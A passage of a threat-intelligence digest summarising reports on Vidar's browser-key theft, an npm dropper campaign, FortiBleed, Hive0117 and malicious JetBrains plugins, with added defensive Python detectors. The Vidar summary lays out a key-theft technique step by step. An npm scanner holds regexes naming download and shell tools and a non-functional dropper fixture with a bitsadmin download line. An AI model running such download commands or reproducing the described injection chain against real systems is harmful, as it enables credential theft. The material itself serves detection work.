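        kind = wallet_type(ev.text)
        if prev is not None and kind is not None and kind == wallet_type(prev.text):
            if prev.text != ev.text and ev.t - prev.t <= window:
                swaps.append((ev.t, prev.text, ev.text))
        prev = ev
    return swaps

# Constructed clipboard timeline. The two BTC strings are the well-known BIP-173
# test vectors, standing in for "user's address" and "attacker's address".
BTC_USER = "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"
BTC_SWAPPED = "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"
ETH_A = "0x742d35Cc6634C0532925a3b844Bc454e4438f44e"
ETH_B = "0x53d284357ec70cE289D6D64134DfAc8E511c8a3D"
SAMPLE_EVENTS = [
    ClipEvent(0.0, "meeting notes for Monday"),
    ClipEvent(5.2, BTC_USER),      # user copies their own address
    ClipEvent(5.3, BTC_SWAPPED),   # 100 ms later it has changed: clipper at work
    ClipEvent(12.0, ETH_A),
    ClipEvent(30.0, ETH_B),        # 18 s later: a normal re-copy, not flagged
    ClipEvent(31.0, "hello"),
]

if __name__ == "__main__":
    for t, before, after in find_swaps(SAMPLE_EVENTS):
        print(f"[{t:6.1f}s] clipboard rewritten: {before} -> {after}")
```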


#threatreport #LowCompleteness
Inside Vidar’s ABE Bypass: From Memory Scanning to APC Injections | 18-06-2026
Source: gendigital.com/blog/insights/…
Key details below ↓
💀Threats:
Vidar_stealer, Remus, Lumma_stealer, Voidstealer, Apc_injection_technique,
🎯Victims: Web browsers
🤖LLM extracted TTPs:
T1055.004, T1057, T1106, T1518.001, T1555.003
🧨IOCs:
- File: 1
- Hash: 1
💽Software: Chromium
🔢Algorithms: aes-256-gcm
🔠Functions: APC
🗂️Win API: CryptProtectData, CryptProtectMemory, CryptUnprotectMemory, NtCreateProcessEx, OpenProcess, CreateDesktopA, NtQueryVirtualMemory, NtReadVirtualMemory, CreateRemoteThread, NtTestAlert, ...
#threatreport:
Vidar, an actively developed information-stealer, has introduced innovative techniques to bypass Application-Bound Encryption (ABE), particularly aimed at extracting the v20_master_key from browser memory. This key is crucial for decrypting any ABE-protected data associated with specific applications. Vidar's method parallels techniques used by other malware, but it achieves its goals through a unique process. Instead of seeking the key from the disk—where it is protected by multiple layers of encryption—Vidar targets the browser's memory.
The process begins by identifying the target browser, which Vidar can do from an already running instance or by creating a new one. It forks the existing browser process without directly reading its memory, instead capturing a static snapshot via `NtCreateProcessEx`. If the target browser is not running, Vidar initiates a new browser session on an isolated desktop, implementing specific command-line arguments to optimize conditions for its tactics. Following this, Vidar enumerates the memory of the forked process, using `NtQueryVirtualMemory`, to identify relevant memory regions fitting its criteria (committed, private, and either readable or read-write).
Vidar searches for the encrypted v20_master_key with a predefined 32-byte signature that matches the internal node structures of Chromium's Encryptor::KeyRing. Upon locating potential candidates for the key, the malware must overcome the fact that the key can only be decrypted within the browser's own process, because it is protected with CryptProtectMemory.
To facilitate this, Vidar uses Asynchronous Procedure Calls (APC) to inject code into the live browser process. The choice of injection method is contingent upon the presence of certain antivirus products, such as ESET or Bitdefender. If either of these is detected, Vidar uses a classic approach to queue an APC after creating a suspended thread. If not detected, it employs a special method leveraging existing threads to execute an APC immediately without requiring the thread to be in an alertable state.
When the APC executes, `CryptUnprotectMemory` decrypts the key in place. Vidar verifies successful decryption by forking the browser process again and comparing values before and after the APC call. It then attempts to use the decrypted key to authenticate entries by scanning for the byte sequence characteristic of ABE data. If the key successfully decrypts data entries, Vidar preserves the updated state of the key in memory using `CryptProtectMemory`. Conversely, if decryption fails across attempts, it terminates and restarts the browser before repeating the entire process.
Through its use of APC injection, a less common and potentially stealthier technique, Vidar seeks to sidestep traditional detection methods, continuously evolving its strategies to bypass ABE defenses and maintain its efficacy as an infostealer.
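An added detection example (not from the Gen Digital report or RST Cloud) for the sequence described above: a non-browser process obtains a fork-capable handle to the browser, then injects into the live browser. It correlates Sysmon-style ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records; the browser list, the 120-second window and the sample events are assumptions constructed for the example.

```python
from collections import defaultdict

# Windows SDK access-mask bits. PROCESS_CREATE_PROCESS alone lets a handle clone
# the target with NtCreateProcessEx; no PROCESS_VM_READ is needed for that.
PROCESS_CREATE_PROCESS = 0x0080
WRITE_BITS = 0x0008 | 0x0020          # PROCESS_VM_OPERATION | PROCESS_VM_WRITE
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}   # assumption: Chromium targets
CORRELATION_WINDOW_S = 120.0

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def indicators_for(event):
    """Indicators carried by one Sysmon-style event (EventID 8 = CreateRemoteThread,
    10 = ProcessAccess with a hex GrantedAccess mask), as a set of labels."""
    inds = set()
    if image_name(event["TargetImage"]) not in BROWSERS:
        return inds
    if image_name(event["SourceImage"]) in BROWSERS:
        return inds                    # browsers open their own children constantly
    if event["EventID"] == 8:
        inds.add("remote_thread")
    elif event["EventID"] == 10:
        mask = int(event["GrantedAccess"], 16)
        if mask & PROCESS_CREATE_PROCESS:
            inds.add("fork_handle")
        if (mask & WRITE_BITS) == WRITE_BITS:
            inds.add("write_handle")
    return inds

def correlate(events, window=CORRELATION_WINDOW_S):
    """Alert once per (source image, browser pid) when a fork-capable handle is
    followed within `window` seconds by a write handle or a remote thread."""
    history = defaultdict(list)        # key -> [(t, indicators)]
    alerted, alerts = set(), []
    for ev in sorted(events, key=lambda e: e["t"]):
        inds = indicators_for(ev)
        if not inds:
            continue
        key = (ev["SourceImage"], ev["TargetProcessId"])
        history[key].append((ev["t"], inds))
        recent = set().union(*(i for t, i in history[key] if ev["t"] - t <= window))
        if key not in alerted and "fork_handle" in recent and recent & {"write_handle", "remote_thread"}:
            alerted.add(key)
            alerts.append({"source": key[0], "target_pid": key[1], "indicators": recent})
    return alerts

# Constructed events: paths, pids and times are made up for this example.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
DROPPER = r"C:\Users\Public\update.exe"
SAMPLE_EVENTS = [
    {"t": 0.0, "EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": CHROME, "TargetProcessId": 4321, "GrantedAccess": "0x1000"},
    {"t": 1.0, "EventID": 10, "SourceImage": CHROME,                 # browser -> own child
     "TargetImage": CHROME, "TargetProcessId": 4480, "GrantedAccess": "0x1FFFFF"},
    {"t": 10.0, "EventID": 10, "SourceImage": DROPPER,               # fork-only handle
     "TargetImage": CHROME, "TargetProcessId": 4321, "GrantedAccess": "0x0080"},
    {"t": 12.5, "EventID": 8, "SourceImage": DROPPER,                # then a remote thread
     "TargetImage": CHROME, "TargetProcessId": 4321},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"ALERT {a['source']} -> browser pid {a['target_pid']}: {sorted(a['indicators'])}")
```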


#threatreport #MediumCompleteness
Five npm Packages That Hide a Windows Binary Dropper | 17-06-2026
Source: safedep.io/procwire-npm-w…
Key details below ↓
💀Threats:
Bitsadmin_tool, Motw_bypass_technique, Lolbin_technique,
🎯Victims: Software supply chain, Windows users
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1027, T1036, T1036.005, T1059.001, T1059.003, T1059.007, T1082, T1105, T1140, T1195.001, ...
🧨IOCs:
- File: 13
- Url: 3
- Email: 2
- Path: 1
- Command: 3
- Domain: 1
💽Software: Node.js, curl
🔢Algorithms: xor
🔠Functions: createServer
📜Programming Languages: powershell
#threatreport:
A recent cybersecurity analysis unveiled a sophisticated attack campaign utilizing five npm packages to deploy a Windows binary dropper. Launched on June 16, 2026, the campaign involved two weaponized packages: procwire@1.3.0, which functions as a Windows binary dropper, and routecraft@4.2.0, posing as an Express clone that pulls in procwire on Windows systems. The remaining three packages serve as tools for the operator, including bytecraft (an XOR utility), endpointmap (which encodes command-and-control [C2] URLs), and staticlayer (a server-side component for the dropper).
The attacker compartmentalized the malicious operations across the packages in a way that allows each to appear harmless when analyzed individually. The exploitation begins with a preinstall hook in procwire, which executes during an npm install. This hook decodes a C2 endpoint stored as XOR-encoded byte arrays in the endpointmap package, subsequently downloading and executing a payload unnoticed. The attack specifically targets Windows systems, halting its execution on other platforms.
The malware employs multiple methods for arbitrary binary execution on Windows hosts during the npm installation process. Notably, it utilizes three distinct download techniques (Node.js HTTPS, curl.exe, bitsadmin) and three execution methods (direct spawn, cmd.exe, PowerShell). This redundancy keeps it working when a host is only partially hardened, and it also tampers with Mark-of-the-Web handling to suppress the Windows SmartScreen alerts that downloaded executables would otherwise trigger. The payloads masquerade under names associated with legitimate software updates, like msedge_update and chrome_installer.
Each npm package carries a convincing description, allowing them to blend seamlessly into the npm ecosystem: procwire is described as a lifecycle and IPC library, while bytecraft is presented as a buffer transformation library. The complexity of execution is heightened by the manner in which the C2 URL is constructed, employing XOR encryption and relying on the package name as a secret key.
The dropper's construction obscures its functionality from static analysis, intentionally avoiding the use of easily detectable strings. It first attempts to retrieve the payload via an HTTP GET request while pretending to be a Microsoft delivery mechanism and disabling TLS verification to avoid detection. In the event of failure, fallback methods such as curl.exe and bitsadmin ensure that the download proceeds regardless of defenses. Furthermore, it employs a fake Zone.Identifier alternate data stream to bypass SmartScreen warnings.
The staticlayer package complements the dropper, operating as a server to serve the payloads but requiring a client that mimics the dropper's User-Agent. This self-hosting capability limits exposure while allowing for efficient distribution of the malicious payload.
In summary, this campaign demonstrates advanced evasion tactics by separating malicious functionalities into inconspicuous components. The analysis highlights the importance of monitoring installation behaviors rather than relying solely on package reputations, as these techniques effectively shield the campaign from conventional detection methods.
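An added example (not from the SafeDep report or the npm packages themselves) of the install-time scanning the summary argues for: it walks a tree for package.json lifecycle hooks and scores each hook command, plus any local script it runs, against token classes derived from the techniques above (LOLBin downloaders, shells, Zone.Identifier tampering, XOR decoding, a Windows-only gate). The regexes, fixture package names and the stub setup.js are this example's own constructions.

```python
import json, os, re, tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Token classes drawn from the behaviours the report describes; the regexes are
# this example's own and will need tuning against a real node_modules tree.
RISK_TOKENS = {
    "lolbin_download": re.compile(r"\b(bitsadmin|certutil|curl\.exe)\b", re.I),
    "shell_exec": re.compile(r"\b(powershell|pwsh|cmd\.exe|cmd /c)\b", re.I),
    "motw_tamper": re.compile(r"Zone\.Identifier", re.I),
    "byte_decode": re.compile(r"(\s\^\s|\bxor\b|fromCharCode|Buffer\.from\()", re.I),
    "platform_gate": re.compile(r"process\.platform\s*[!=]==?\s*['\"]win32['\"]"),
}

def scan_package(pkg_dir):
    """Report every lifecycle hook in one package, with risk tokens found in the
    hook command itself and in any local JS file it runs via `node <file>`."""
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        text = cmd
        for m in re.finditer(r"\bnode\s+(\S+\.[cm]?js)\b", cmd):
            script = os.path.join(pkg_dir, m.group(1))
            if os.path.isfile(script):
                with open(script, encoding="utf-8", errors="replace") as fh:
                    text += "\n" + fh.read()
        risk = sorted(name for name, pat in RISK_TOKENS.items() if pat.search(text))
        findings.append({"package": manifest.get("name"), "hook": hook, "command": cmd, "risk": risk})
    return findings

def scan_tree(root):
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                      # deterministic traversal order
        if "package.json" in filenames:
            findings.extend(scan_package(dirpath))
    return findings

# Constructed fixtures: a benign native add-on and a package shaped like the
# dropper described above (non-functional sketch; `enc` and `out` are undefined).
FIXTURES = {
    "native-lib": {"package.json": json.dumps({"name": "native-lib", "scripts": {"install": "node-gyp rebuild"}})},
    "example-dropper": {
        "package.json": json.dumps({"name": "example-dropper", "scripts": {"preinstall": "node ./setup.js"}}),
        "setup.js": (
            "if (process.platform !== 'win32') process.exit(0);\n"
            "const k = Buffer.from(require('./package.json').name), dec = enc.map((b, i) => b ^ k[i % k.length]);\n"
            "require('child_process').spawn('bitsadmin', ['/transfer', 'j', String.fromCharCode(...dec), out]);\n"
        ),
    },
}

def demo():
    """Write the fixtures under a temporary node_modules and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for pkg, files in FIXTURES.items():
            pkg_dir = os.path.join(root, "node_modules", pkg)
            os.makedirs(pkg_dir)
            for fname, body in files.items():
                with open(os.path.join(pkg_dir, fname), "w", encoding="utf-8") as fh:
                    fh.write(body)
        return scan_tree(root)
```

`demo()` returns one finding per hook; the benign `node-gyp rebuild` hook is listed with an empty risk list, so an analyst still sees which packages run code at install time even when nothing matched.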


#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 1, table: 1, windows: 1, code: 5, chart: 3, chats: 1, dump: 1


#threatreport #MediumCompleteness
Inside the FortiBleed Open Directory: A Technical Analysis of What the Attacker Left Behind | 19-06-2026
Source: cloudsek.com/blog/inside-th…
Key details below ↓
🧑💻Actors/Campaigns:
Fortibleed
💀Threats:
Impacket_tool, Password_spray_technique, Credential_harvesting_technique,
🎯Victims: Telecommunications, Internet service providers, Organisations running exposed fortios management interfaces
🏭Industry: Telco
🌐Geo: Mexico, Taiwan, India, Turkey, Asia, Colombia, United states
🤖LLM extracted TTPs:
T1040, T1078, T1087.002, T1110, T1110.002, T1110.003, T1110.004, T1133, T1135, T1552, ...
🧨IOCs:
- File: 11
- IP: 9
💽Software: Telegram, Active Directory
🔢Algorithms: sha256, pbkdf2
#threatreport:
FortiBleed is an extensive credential-compromise campaign actively targeting Fortinet FortiGate firewalls and SSL VPN gateways on the internet. It is characterized not as a software vulnerability or a zero-day exploit but as the result of a database compiled by a threat actor through credential reuse, brute force attacks, and offline hash cracking against exposed devices.
The evidence left by attackers includes various scripts and tools categorized into distinct operational layers. Layer 1 consists of credential data gathered from device configuration exports via exposed management interfaces, containing legacy salted-SHA256 and newer PBKDF2 format hashes that identify firewall administrators. However, attribution based on FortiGuard license registration emails is problematic, as many high-profile credentials link to contractors or subsidiaries rather than the corporations themselves. Layer 2 involves advanced credential capture techniques like Kerberos pre-authentication data acquired through network sniffing after pivoting into the network, which reveals internal Active Directory domain names from the victim's infrastructure.
The operational toolkit indicates the campaign's capability to extend beyond the firewall itself, utilizing tools such as ad_enum.py for enumerating Active Directory over LDAP and conducting password spraying against internal domain controllers with scripts like spray_admin.sh. The reported cracking power was linked to a modest configuration of rented GPU instances rather than a dedicated cluster, revealing a potential underestimation of the campaign’s resources.
The dataset, termed targets_300M_plus.txt, ranks SSH and VPN endpoints by revenue, confirming that the attackers had usable access rather than merely cracked password lists. While the attackers’ origins remain difficult to pin down, some linguistic clues in their tooling hint at Russian influence, though numerous named passwords suggest connections to Persian regions as well.
Regarding the extent of the compromise, India has the highest number of affected devices, followed by the United States and Taiwan. Despite the reported presence of approximately 21,000 compromised domains, most belong to internal network names that are not externally traceable, thus over-reporting the actual compromised organizations. The mix of public and non-routable domain entries suggests a wide-reaching campaign that indiscriminately scanned for exposed Fortinet products without specific targeting.
Given the operation's sophistication, organizations with exposed FortiOS management interfaces are advised to treat their credentials as compromised. Recommended mitigation strategies include removing public exposure of the management interfaces, rotating administrator and VPN credentials, enforcing multi-factor authentication, and ensuring that devices are updated to the latest FortiOS, thereby securing the integrity of access control systems. Additionally, organizations should audit for backdoor accounts and unusual login patterns, replacing devices when signs of compromise are evident.


#threatreport #HighCompleteness
Honeypot: Investigating Attacks by the Hive0117 Group on Accountants at Companies in Russia and CIS Countries | 18-06-2026
Source: f6.ru/blog/honey-tra…
Key details below ↓
🧑💻Actors/Campaigns:
Watch_wolf (🧠motivation: financially_motivated, cyber_criminal)
💀Threats:
Darkwatchman, Lite_manager_tool, Bitrat, Hvnc_tool, Shadow_copies_delete_technique,
🎯Victims: Accountants, Finance departments, Legal entities, Companies in russia, Organizations in the commonwealth of independent states
🏭Industry: Telco, Chemical, Financial, Retail
🌐Geo: Russian, Kazakhstan, Belarus, Russia, Uzbekistan
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1010, T1012, T1027, T1027.004, T1036, T1041, T1053.005, T1056.001, T1059.001, T1059.003, ...
🧨IOCs:
- File: 9
- Command: 1
- Hash: 12
- Domain: 30
- IP: 2
💽Software: Telegram, VKontakte, Viber, WhatsApp, Android, Windows registry, Chrome, Firefox
🔢Algorithms: md5, sha1, sha256
🔠Functions: PowerShell, SetWindowsHookEx
📜Programming Languages: javascript, powershell
#threatreport:
The attacks conducted by the financially motivated Hive0117 group have intensified in 2026, primarily targeting accountants within companies across Russia and the CIS nations. This group, which has been active since late 2021, employs a range of sophisticated techniques and malware, most notably the fileless malware known as DarkWatchman. The primary goal of these attacks is to infiltrate online banking systems to siphon money into accounts controlled by the attackers, often disguising the transactions as legitimate payroll transfers.
The modus operandi of Hive0117 involves sending phishing emails that appear to carry legitimate documents but conceal the DarkWatchman malware in RAR archives. These emails use subject lines designed to entice accountants, such as "Invoice," "Delivery Note," and "Outstanding Payment." To bypass email filters, the archives are password-protected, with the password included in the email body. When the recipient unpacks the RAR archive, they inadvertently execute the malicious payload, enabling the attackers to infiltrate their devices.
Post-installation, DarkWatchman operates by gathering sensitive information, such as keystrokes and clipboard contents, especially focusing on tracking any cryptographic tokens used for accessing corporate banking systems. Once the attackers ascertain the presence of a token on an infected device, they can escalate their access by deploying additional remote access tools like LiteManager or BitRAT. This allows them to manipulate the compromised machines directly, executing payment transactions that appear legitimate to anti-fraud measures in place for corporate accounts.
Hive0117's attack strategies not only leverage DarkWatchman but also integrate a keylogger module that compiles C# scripts to monitor user interactions. Besides capturing keystrokes, this keylogger detects any smart cards connected to the workstation, enabling timely unauthorized actions once a token is present.
Further tactics include the use of HVNC (Hidden Virtual Network Computing) malware, which allows the attackers to create an unseen virtual desktop on the victim’s machine, facilitating more seamless control over the device while impersonating the user. This malware can manipulate the clipboard, execute scripts, and even manage browser sessions that access banking portals, showcasing the sophistication of Hive0117's operations.
The evidence underscores that since the onset of 2026, Hive0117 has successfully executed approximately 400 attacks on Russian enterprises, with average financial losses from their operations escalating significantly within just a couple of months. The group's combination of advanced phishing techniques, nuanced malware functionalities, and controlled deployment strategies exemplifies a high-stakes financial cybercriminal operation, demanding serious attention and countermeasures from security teams.

#threatreport #MediumCompleteness
15 Malicious JetBrains Plugins Stole AI API Keys from 70,000 Developers | 18-06-2026
Source: stepsecurity.io/blog/jetbrains…
Key details below ↓
💀Threats:
Supply_chain_technique, Credential_stealing_technique, Trufflehog_tool,
🎯Victims: Software developers, Software development
🏭Industry: E-commerce
🌐Geo: Chinese, China
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1036, T1041, T1056, T1071.001, T1195.001
🧨IOCs:
- IP: 1
- File: 8
- Url: 2
- Path: 1
💽Software: JetBrains, DeepSeek, OpenAI, Alibaba Cloud, macOS, Linux
🔠Functions: FindBugs, save, Gson
📜Programming Languages: java
#threatreport:
In June 2026, a coordinated supply chain attack targeted JetBrains, utilizing 15 malicious plugins on its Marketplace that masqueraded as AI-powered development tools. These plugins, published under seven different vendor accounts, claimed to offer functionalities such as code review and test generation while embedding hidden credential-stealing code. The attack leveraged a fundamental trust model, as developers typically expect plugins from reputable marketplaces to be secure.
Upon entering an AI provider API key into the plugins, the keys were silently exfiltrated over unencrypted HTTP to a command-and-control server at the address 39.107.60.51, hosted on Alibaba Cloud in Beijing, China. Each plugin was designed with a save() method that validated the API key's format and stored new keys for exfiltration, demonstrating a careful approach to avoid detection. By employing a deduplication check, the attackers minimized network noise and detection risk. Furthermore, the absence of encryption in the data exfiltration process made interception trivial for defenders.
The malicious plugins also included a "donation wall" feature, which required users to pay to receive a working API key in return—likely one already stolen from another victim. This allowed the attackers to create a self-sustaining revenue model while burdening original key owners with undesired API charges.
Following security reports, JetBrains removed all 15 plugins from its Marketplace and permanently banned the associated vendor accounts while implementing a remote kill-switch to disable the extensions. An independent investigation confirmed that the C2 server remained operational three days later, indicating potential ongoing exploitation of stolen API keys and the possibility of pivoting to other platforms.
Detection measures for identifying compromised systems include monitoring outbound HTTP connections from IDE processes to the C2 IP address, searching for the malicious plugin identifiers on disk, inspecting network logs for connections to the C2 server, and auditing AI provider dashboards for compromised keys. Organizations are encouraged to revoke and rotate affected API keys, block the C2 server, and use secrets scanners to ensure no API keys were unintentionally exposed in source code.
To streamline responses across developer teams, tools like Dev Machine Guard can inventory IDE extensions on a broader scale, allowing security teams to instantly identify impacted machines without relying on developers to self-report. This approach also ensures visibility across different IDEs, thereby enhancing detection capabilities against similar supply chain threats in the future.
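An added example (not from the StepSecurity report or RST Cloud) of the network check suggested above: it triages constructed connection-log lines for the C2 address named in the report and for JetBrains IDE processes speaking plaintext HTTP, which is how the stolen keys left the machine. The log format, host names, IDE process names and non-C2 addresses are assumptions made for the example.

```python
import re
from ipaddress import ip_address

# Indicator taken from the report above; everything else here is this example's.
KNOWN_C2 = {ip_address("39.107.60.51")}
# Process names of JetBrains IDEs on Windows / macOS / Linux (assumption).
IDE_PROCESSES = {"idea64.exe", "pycharm64.exe", "webstorm64.exe", "goland64.exe",
                 "idea", "pycharm", "webstorm", "goland"}

# Constructed log format: "<ts> host=<h> dst=<ip>:<port> proc=<image path>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+dst=(?P<ip>[\d.]+):(?P<port>\d+)\s+proc=(?P<proc>.+?)\s*$")

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ip"] = ip_address(rec["ip"])
    rec["port"] = int(rec["port"])
    rec["proc"] = rec["proc"].rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower()   # basename
    return rec

def rules(rec):
    """Return the rule names a parsed connection trips."""
    hits = []
    if rec["ip"] in KNOWN_C2:
        hits.append("known_c2")
    if rec["proc"] in IDE_PROCESSES and rec["port"] == 80:
        hits.append("ide_plaintext_http")     # API-key traffic should never leave in the clear
    return hits

def triage(lines):
    """Return (host, proc, 'ip:port', [rules]) for every line that trips a rule."""
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        hits = rules(rec)
        if hits:
            alerts.append((rec["host"], rec["proc"], f"{rec['ip']}:{rec['port']}", hits))
    return alerts

# Constructed sample log (hosts and times are made up; 203.0.113.x and 198.51.100.x
# are documentation ranges standing in for ordinary destinations).
SAMPLE_LOG = """\
2026-06-18T09:12:03Z host=dev-07 dst=39.107.60.51:80 proc=C:\\Program Files\\JetBrains\\IntelliJ IDEA\\bin\\idea64.exe
2026-06-18T09:12:09Z host=dev-07 dst=203.0.113.9:80 proc=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
2026-06-18T09:14:41Z host=dev-12 dst=203.0.113.7:80 proc=/Applications/PyCharm.app/Contents/MacOS/pycharm
2026-06-18T09:15:02Z host=dev-12 dst=198.51.100.20:443 proc=/Applications/PyCharm.app/Contents/MacOS/pycharm
2026-06-18T09:20:55Z host=build-03 dst=39.107.60.51:443 proc=/usr/bin/curl
garbage line that does not parse
"""

if __name__ == "__main__":
    for host, proc, dst, hits in triage(SAMPLE_LOG.splitlines()):
        print(f"{host:9} {proc:12} -> {dst:20} {','.join(hits)}")
```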

